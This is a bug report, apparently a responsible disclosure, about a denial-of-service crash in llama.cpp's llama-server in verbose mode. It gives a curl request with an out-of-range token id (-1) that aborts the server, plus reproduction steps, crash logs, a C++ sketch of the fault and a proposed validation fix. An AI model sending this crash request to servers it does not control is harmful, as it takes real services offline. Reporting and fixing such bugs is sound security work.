Name and Version
~/git/llama.cpp/build/bin/ [tags/b4798] ./llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M3 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M3 Pro)
version: 4798 (1782cdf)
built with Apple clang version 16.0.0 (clang-1600.0.26.6) for arm64-apple-darwin24.3.0
Operating systems
No response
Which llama.cpp modules do you know to be affected?
llama-server
Command line
# Run the latest tag inside container
docker run --rm -it ubuntu
apt update
apt install -y wget unzip curl build-essential
wget https://github.com/ggml-org/llama.cpp/releases/download/b4798/llama-b4798-bin-ubuntu-arm64.zip
unzip llama-b4798-bin-ubuntu-arm64.zip
# Run the server
LD_LIBRARY_PATH=$(pwd)/build/bin ./build/bin/llama-server -m /tmp/DeepSeek-R1-Distill-Qwen-1.5B-Q8_0.gguf -v
# Crash the server
curl -vvvv http://localhost:8080/v1/completions -d '{"prompt":[-1]}'
Problem description & steps to reproduce
Summary
An unhandled exception crashes the server in the /v1/completions route when the server is running in verbose mode. An attacker can send a completion request containing token ids that are not in the vocabulary / out of range, which crashes the application.
I opened this issue per your request, after closing https://github.com/ggml-org/llama.cpp/security/advisories/GHSA-9fg6-6f9w-fgj3
Details
I recently ran into an unintended crash that anyone can trigger with a single HTTP request, causing denial of service. It affects both Debug and Release builds and depends on the -v flag.
PoC
I verified the PoC on two different OSs (Linux, macOS) and model architectures (Qwen, Llama). I tested it in an Ubuntu container and on my host (an up-to-date M3). I also tested builds compiled from source, but here I will use the prebuilt binaries.
Download and run the latest llama-server build with the -v flag:
docker run --rm -it ubuntu
apt update
apt install -y wget unzip curl build-essential
wget https://github.com/ggml-org/llama.cpp/releases/download/b4798/llama-b4798-bin-ubuntu-arm64.zip
unzip llama-b4798-bin-ubuntu-arm64.zip
Modify the model path as needed; I copied the model into the container with docker cp:
LD_LIBRARY_PATH=$(pwd)/build/bin ./build/bin/llama-server -m /tmp/DeepSeek-R1-Distill-Qwen-1.5B-Q8_0.gguf -v
First, the following request infers 2 tokens successfully, to confirm the model works:
curl -vvvv http://localhost:8080/v1/completions -d '{"prompt":[1], "max_tokens": 2}'
The following request crashes the application, demonstrating the denial-of-service vulnerability by triggering an uncaught exception:
curl -vvvv http://localhost:8080/v1/completions -d '{"prompt":[-1]}'
The server crashes due to an out-of-range error (no token is mapped to the value -1) when it tries to print the token to STDOUT:
que post: new task, id = 56/1, front = 0
que start_loop: processing new tasks
que start_loop: processing task, id = 56
slot get_availabl: id 0 | task 0 | selected slot by lru, t_last = 43778350372
slot reset: id 0 | task 0 |
terminate called after throwing an instance of 'std::out_of_range'
what(): vector::_M_range_check: __n (which is 18446744073709551615) >= this->size() (which is 151936)
Aborted
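The huge index in the what() message is the attacker-supplied -1 converted to the vector's unsigned index type: it wraps to 18446744073709551615 (SIZE_MAX). Below is a minimal standalone sketch of the failure mode, assuming the verbose logger indexes the id-to-token table with the raw token id; this is not the actual server code, and 151936 matches the vocab size in the log:

```cpp
#include <cstdint>
#include <iostream>
#include <stdexcept>
#include <string>
#include <vector>

int main() {
    // Stand-in for the id-to-token table; 151936 matches the vocab size in the log.
    std::vector<std::string> id_to_token(151936, "tok");

    int32_t token = -1; // attacker-controlled token id from the request body

    // vector::at takes an unsigned size_t, so -1 wraps to 18446744073709551615
    // (SIZE_MAX) and the bounds check throws std::out_of_range. In the server
    // the exception is never caught, so std::terminate aborts the process.
    try {
        std::cout << id_to_token.at(static_cast<size_t>(token)) << "\n";
    } catch (const std::out_of_range & e) {
        std::cout << "out_of_range: " << e.what() << "\n";
    }
}
```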
Impact
Any server running llama.cpp in verbose mode is subject to DoS via a single HTTP request.
Suggested behavior (opinion)
When receiving a prompt as a list of integer tokens, the server should verify that the tokens are supported by the current vocab / tokenizer. Validating every input just for the sake of verbose logging does not make sense and can be expensive, which is overkill.
But, on the other hand, the user should get a clear error when invalid / unsupported tokens are provided, whether or not the server runs in verbose mode. The logging code could also skip unknown tokens by checking that each value has a mapping and is within the supported range. A sketch of such a validation step is shown below.
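For illustration, a minimal sketch of what such a check could look like, assuming the handler can query the vocab size from the loaded model (e.g. via llama_n_vocab(), depending on the llama.cpp version); the helper name and types here are hypothetical, not the actual server code:

```cpp
#include <cstdint>
#include <iostream>
#include <string>
#include <vector>

// Stand-in for the real vocab size; a server would query the loaded model
// (e.g. llama_n_vocab(), depending on the llama.cpp version).
static int32_t get_n_vocab() { return 151936; }

// Hypothetical helper: returns an error message, or an empty string if all
// token ids are in range.
static std::string validate_prompt_tokens(const std::vector<int32_t> & tokens) {
    const int32_t n_vocab = get_n_vocab();
    for (size_t i = 0; i < tokens.size(); ++i) {
        if (tokens[i] < 0 || tokens[i] >= n_vocab) {
            return "invalid token id " + std::to_string(tokens[i]) +
                   " at position " + std::to_string(i) +
                   " (vocab size: " + std::to_string(n_vocab) + ")";
        }
    }
    return "";
}

int main() {
    const std::string err = validate_prompt_tokens({-1});
    // A request handler could return HTTP 400 with this message instead of aborting.
    std::cout << (err.empty() ? "ok" : err) << "\n";
}
```

With a check like this early in the request handler, the server could respond with a clear error instead of aborting.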
Thanks in advance!
First Bad Commit
No response
Relevant log output
que post: new task, id = 56/1, front = 0
que start_loop: processing new tasks
que start_loop: processing task, id = 56
slot get_availabl: id 0 | task 0 | selected slot by lru, t_last = 43778350372
slot reset: id 0 | task 0 |
terminate called after throwing an instance of 'std::out_of_range'
what(): vector::_M_range_check: __n (which is 18446744073709551615) >= this->size() (which is 151936)
Aborted